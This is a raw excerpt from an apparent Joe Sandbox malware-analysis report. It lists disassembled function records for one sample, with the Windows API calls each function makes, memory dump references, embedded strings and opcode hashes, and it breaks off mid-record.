                    • SetErrorMode.KERNEL32(00000000,READY), ref: 006EB828
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Error$Mode$DiskFreeLastSpace
                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                    • API String ID: 4194297153-14809454
                    • Opcode ID: 3040ec983f8a0cae865db62e4ea773691cef3b086f2dde3762f78c02d75517c6
                    • Instruction ID: c685ccaa85857e6e9d65e97c994dbcc6a5bb400b3c7ea95cf178229d2441d473
                    • Opcode Fuzzy Hash: 3040ec983f8a0cae865db62e4ea773691cef3b086f2dde3762f78c02d75517c6
                    • Instruction Fuzzy Hash: 9F31A135A01348AFDB10EF65C886AFF77B6EF48700F148129E5029B392DB759942CB51
                    APIs
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                      • Part of subcall function 006DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006DB0E7
                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 006D94F6
                    • GetDlgCtrlID.USER32 ref: 006D9501
                    • GetParent.USER32 ref: 006D951D
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 006D9520
                    • GetDlgCtrlID.USER32(?), ref: 006D9529
                    • GetParent.USER32(?), ref: 006D9545
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 006D9548
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: 9a84fad48f11de5cb211ad876d1d4f5af23b1f06db79352518d2806fcaae9aff
                    • Instruction ID: 9fe91a3e7e02c9957b8db89c8ca337a65640696dbb8d29b81a15b2ad3595fd74
                    • Opcode Fuzzy Hash: 9a84fad48f11de5cb211ad876d1d4f5af23b1f06db79352518d2806fcaae9aff
                    • Instruction Fuzzy Hash: 9D21E274D00204EBCF04AF64CC85DFEBBB6EF45300F10422AF622972E2DB7999199B24
                    APIs
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                      • Part of subcall function 006DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006DB0E7
                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 006D95DF
                    • GetDlgCtrlID.USER32 ref: 006D95EA
                    • GetParent.USER32 ref: 006D9606
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 006D9609
                    • GetDlgCtrlID.USER32(?), ref: 006D9612
                    • GetParent.USER32(?), ref: 006D962E
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 006D9631
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: 8021ee3c79f12f541c7e1b6df11cbfd436adb13ba9111f27071ad25b39d4caf3
                    • Instruction ID: 499056be06a1b1a5141fd021145d3931ad23bbe058c4f330f0b563032ff007ae
                    • Opcode Fuzzy Hash: 8021ee3c79f12f541c7e1b6df11cbfd436adb13ba9111f27071ad25b39d4caf3
                    • Instruction Fuzzy Hash: C421B674D00204FBDF15AB64CCC5EFEBB75EF44300F10421AF611972A1DB7995199B24
                    APIs
                    • GetParent.USER32 ref: 006D9651
                    • GetClassNameW.USER32(00000000,?,00000100), ref: 006D9666
                    • _wcscmp.LIBCMT ref: 006D9678
                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 006D96F3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ClassMessageNameParentSend_wcscmp
                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                    • API String ID: 1704125052-3381328864
                    • Opcode ID: e77504bf7a2e008f79762f9ffcebd674b09c0f7447dabd7b44a774c9d11ccb22
                    • Instruction ID: 58de621099fbcad20ae42a7be67c21f7981ca5550e7a643452e307c6972e15c8
                    • Opcode Fuzzy Hash: e77504bf7a2e008f79762f9ffcebd674b09c0f7447dabd7b44a774c9d11ccb22
                    • Instruction Fuzzy Hash: 3C110A77648357BAF6113620DC06DE6B79E8B05360F20012BFA00E52D2FE96ED514A6C
                    APIs
                    • __swprintf.LIBCMT ref: 006E419D
                    • __swprintf.LIBCMT ref: 006E41AA
                      • Part of subcall function 006A38D8: __woutput_l.LIBCMT ref: 006A3931
                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 006E41D4
                    • LoadResource.KERNEL32(?,00000000), ref: 006E41E0
                    • LockResource.KERNEL32(00000000), ref: 006E41ED
                    • FindResourceW.KERNEL32(?,?,00000003), ref: 006E420D
                    • LoadResource.KERNEL32(?,00000000), ref: 006E421F
                    • SizeofResource.KERNEL32(?,00000000), ref: 006E422E
                    • LockResource.KERNEL32(?), ref: 006E423A
                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 006E429B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                    • String ID:
                    • API String ID: 1433390588-0
                    • Opcode ID: b2aecb14866852af471d1635855e9a2cb8032392826b609b5bfb3d9ce46f37c7
                    • Instruction ID: ee7c38594a8406dbce18503fbe2d14e36a4c1cbc9599801153b520d3bd5b05de
                    • Opcode Fuzzy Hash: b2aecb14866852af471d1635855e9a2cb8032392826b609b5bfb3d9ce46f37c7
                    • Instruction Fuzzy Hash: 4F31917550625AAFDB119F61DC48ABF7BAEFF09301F008525F901D6250EB34DA61CBA4
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 006E1700
                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,006E0778,?,00000001), ref: 006E1714
                    • GetWindowThreadProcessId.USER32(00000000), ref: 006E171B
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006E0778,?,00000001), ref: 006E172A
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 006E173C
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006E0778,?,00000001), ref: 006E1755
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006E0778,?,00000001), ref: 006E1767
                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,006E0778,?,00000001), ref: 006E17AC
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006E0778,?,00000001), ref: 006E17C1
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006E0778,?,00000001), ref: 006E17CC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                    • String ID:
                    • API String ID: 2156557900-0
                    • Opcode ID: d55979fffb9b48e653e85ac38207554a4c9b7bd48ef93c40e6cf4f447ac8ffcd
                    • Instruction ID: c4f0fd7598c77792e48ccb0830363961a7a031e33b892e6fa04bc9d76c6c9575
                    • Opcode Fuzzy Hash: d55979fffb9b48e653e85ac38207554a4c9b7bd48ef93c40e6cf4f447ac8ffcd
                    • Instruction Fuzzy Hash: E931A079601344EBDB25DF15DC84BA937AAAB1BB52F108016F8008E3A0DB789D45DB54
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$_memset
                    • String ID: ,,q$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                    • API String ID: 2862541840-1224034363
                    • Opcode ID: 4448791c1dc199f3b8891d5791caf8b8de5b7ab18696a4bb7374f84ad2a7a4cd
                    • Instruction ID: 58c9eac74d24941004bf868977df1a3aac0801f2df6646ec7853c11642c3f9a2
                    • Opcode Fuzzy Hash: 4448791c1dc199f3b8891d5791caf8b8de5b7ab18696a4bb7374f84ad2a7a4cd
                    • Instruction Fuzzy Hash: D6919B71A00219ABEF24DFA5C848FEEBBBAEF45710F108159F615EB281D7709945CFA0
                    APIs
                    • EnumChildWindows.USER32(?,006DAA64), ref: 006DA9A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ChildEnumWindows
                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                    • API String ID: 3555792229-1603158881
                    • Opcode ID: e3bfb8dac74886c555e0b9dd61f20ff8099f46f612a8fdea4548df6f887893c3
                    • Instruction ID: 345b7ece028e3b0ebf1ba7a1528b756821fe07635ad5df03635b24b50d9cf899
                    • Opcode Fuzzy Hash: e3bfb8dac74886c555e0b9dd61f20ff8099f46f612a8fdea4548df6f887893c3
                    • Instruction Fuzzy Hash: 2391B771D04506DBDB58EFA0C491BE9F776BF04300F50812EE99AA7341DF30AA5ACB95
                    APIs
                    • SetWindowLongW.USER32(?,000000EB), ref: 00682EAE
                      • Part of subcall function 00681DB3: GetClientRect.USER32(?,?), ref: 00681DDC
                      • Part of subcall function 00681DB3: GetWindowRect.USER32(?,?), ref: 00681E1D
                      • Part of subcall function 00681DB3: ScreenToClient.USER32(?,?), ref: 00681E45
                    • GetDC.USER32 ref: 006BCF82
                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 006BCF95
                    • SelectObject.GDI32(00000000,00000000), ref: 006BCFA3
                    • SelectObject.GDI32(00000000,00000000), ref: 006BCFB8
                    • ReleaseDC.USER32(?,00000000), ref: 006BCFC0
                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 006BD04B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                    • String ID: U
                    • API String ID: 4009187628-3372436214
                    • Opcode ID: 4fdd6aa6d22b61821d983eae84e697eb9b48158ab49db625511411c01a4c733e
                    • Instruction ID: 4efc2c811f5610e678ececcf75fd0ea6794575964c27dae3ea36f53023294d8f
                    • Opcode Fuzzy Hash: 4fdd6aa6d22b61821d983eae84e697eb9b48158ab49db625511411c01a4c733e
                    • Instruction Fuzzy Hash: AF71E5B0400205DFCF219F64C894AFA3BBBFF49364F14836AED555A2A6D7318D82DB61
                    APIs
                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0070F910), ref: 006F903D
                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0070F910), ref: 006F9071
                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 006F91EB
                    • SysFreeString.OLEAUT32(?), ref: 006F9215
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                    • String ID:
                    • API String ID: 560350794-0
                    • Opcode ID: 5f207e82e9d8eb66734a1e57dc683b763d388f6bfcb519234cbdeddb9e153371
                    • Instruction ID: 75c56bdab7d38bd4b637479e51efebe9e96402dc0a565dcd1bb38adee7dc06df
                    • Opcode Fuzzy Hash: 5f207e82e9d8eb66734a1e57dc683b763d388f6bfcb519234cbdeddb9e153371
                    • Instruction Fuzzy Hash: 22F10971A00109EFDB14DF94C888EFEB7BABF89314F148159F615AB251DB31AE46CB60
                    APIs
                    • _memset.LIBCMT ref: 006FF9C9
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006FFB5C
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006FFB80
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006FFBC0
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006FFBE2
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006FFD5E
                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 006FFD90
                    • CloseHandle.KERNEL32(?), ref: 006FFDBF
                    • CloseHandle.KERNEL32(?), ref: 006FFE36
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                    • String ID:
                    • API String ID: 4090791747-0
                    • Opcode ID: a259bce6f853726af5f520b56e43f7c950e87e8ba72551224c12180f359bbc3d
                    • Instruction ID: 31e4512e09c1f69015d97bc83dc9565bc203c918bcad69eb974be48dd5a75de2
                    • Opcode Fuzzy Hash: a259bce6f853726af5f520b56e43f7c950e87e8ba72551224c12180f359bbc3d
                    • Instruction Fuzzy Hash: 6BE1BF31204345DFCB64EF24C891A7ABBE2AF85354F18856DF9998B3A2CB31DC41CB56
                    APIs
                      • Part of subcall function 006E48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006E38D3,?), ref: 006E48C7
                      • Part of subcall function 006E48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006E38D3,?), ref: 006E48E0
                      • Part of subcall function 006E4CD3: GetFileAttributesW.KERNEL32(?,006E3947), ref: 006E4CD4
                    • lstrcmpiW.KERNEL32(?,?), ref: 006E4FE2
                    • _wcscmp.LIBCMT ref: 006E4FFC
                    • MoveFileW.KERNEL32(?,?), ref: 006E5017
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                    • String ID:
                    • API String ID: 793581249-0
                    • Opcode ID: e87148a581a25fe8515d0943788773dc64ff9b831dcec2fb3726942934439978
                    • Instruction ID: 5af026fb322289f752871df20cd502d760394f2ca5d2414b45231cdce348a0e1
                    • Opcode Fuzzy Hash: e87148a581a25fe8515d0943788773dc64ff9b831dcec2fb3726942934439978
                    • Instruction Fuzzy Hash: A85198B20097859BC764EB64CC819DFB3EDAF85700F10492EF285C7151EF74E5888B6A
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0070896E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: 66961a849945dd68102b4dabdfcd3cb558a3aed75f06245ac9f459b632bb08c0
                    • Instruction ID: 717c3764c31e7b4065fd6f0990a54fdabe9e90ac2a2937d6c5c8d023b0cbea11
                    • Opcode Fuzzy Hash: 66961a849945dd68102b4dabdfcd3cb558a3aed75f06245ac9f459b632bb08c0
                    • Instruction Fuzzy Hash: 1E51A470610208FADFB09F24CC89B697BE5BB15320F508316F591E66E1DF79A9809B86
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 006BC547
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006BC569
                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 006BC581
                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 006BC59F
                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 006BC5C0
                    • DestroyIcon.USER32(00000000), ref: 006BC5CF
                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 006BC5EC
                    • DestroyIcon.USER32(?), ref: 006BC5FB
                      • Part of subcall function 0070A71E: DeleteObject.GDI32(00000000), ref: 0070A757
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                    • String ID:
                    • API String ID: 2819616528-0
                    • Opcode ID: 439d906a3b1404ff4850a70265f34f6d79a83e931eed766aaf4412d874015b6c
                    • Instruction ID: 816d5fd4c3f7da6c066c99002d78c838bba4660449b449df2cabc2a7e30cab44
                    • Opcode Fuzzy Hash: 439d906a3b1404ff4850a70265f34f6d79a83e931eed766aaf4412d874015b6c
                    • Instruction Fuzzy Hash: 21517CB460020AEFDB20EF24CC55FEA37B6EB58720F104629F902976A0DB74ED91DB54
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,006D8A84,00000B00,?,?), ref: 006D8E0C
                    • HeapAlloc.KERNEL32(00000000,?,006D8A84,00000B00,?,?), ref: 006D8E13
                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,006D8A84,00000B00,?,?), ref: 006D8E28
                    • GetCurrentProcess.KERNEL32(?,00000000,?,006D8A84,00000B00,?,?), ref: 006D8E30
                    • DuplicateHandle.KERNEL32(00000000,?,006D8A84,00000B00,?,?), ref: 006D8E33
                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,006D8A84,00000B00,?,?), ref: 006D8E43
                    • GetCurrentProcess.KERNEL32(006D8A84,00000000,?,006D8A84,00000B00,?,?), ref: 006D8E4B
                    • DuplicateHandle.KERNEL32(00000000,?,006D8A84,00000B00,?,?), ref: 006D8E4E
                    • CreateThread.KERNEL32(00000000,00000000,006D8E74,00000000,00000000,00000000), ref: 006D8E68
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                    • String ID:
                    • API String ID: 1957940570-0
                    • Opcode ID: dfc6d2b661047a338680b48ee153d7318227833fd919e02de232999a4b580c78
                    • Instruction ID: 823eecfc86ca9fafa84ff20a62892deec43b7a363aafae941bf565cf5eeffeee
                    • Opcode Fuzzy Hash: dfc6d2b661047a338680b48ee153d7318227833fd919e02de232999a4b580c78
                    • Instruction Fuzzy Hash: 7801A4B5640308FFE620EBA5DC4DF6B3BACEB89711F018521FA05DB6A1CA749C008A24
                    APIs
                      • Part of subcall function 006D7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?,?,?,006D799D), ref: 006D766F
                      • Part of subcall function 006D7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?,?), ref: 006D768A
                      • Part of subcall function 006D7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?,?), ref: 006D7698
                      • Part of subcall function 006D7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?), ref: 006D76A8
                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 006F9B1B
                    • _memset.LIBCMT ref: 006F9B28
                    • _memset.LIBCMT ref: 006F9C6B
                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 006F9C97
                    • CoTaskMemFree.OLE32(?), ref: 006F9CA2
                    Strings
                    • NULL Pointer assignment, xrefs: 006F9CF0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
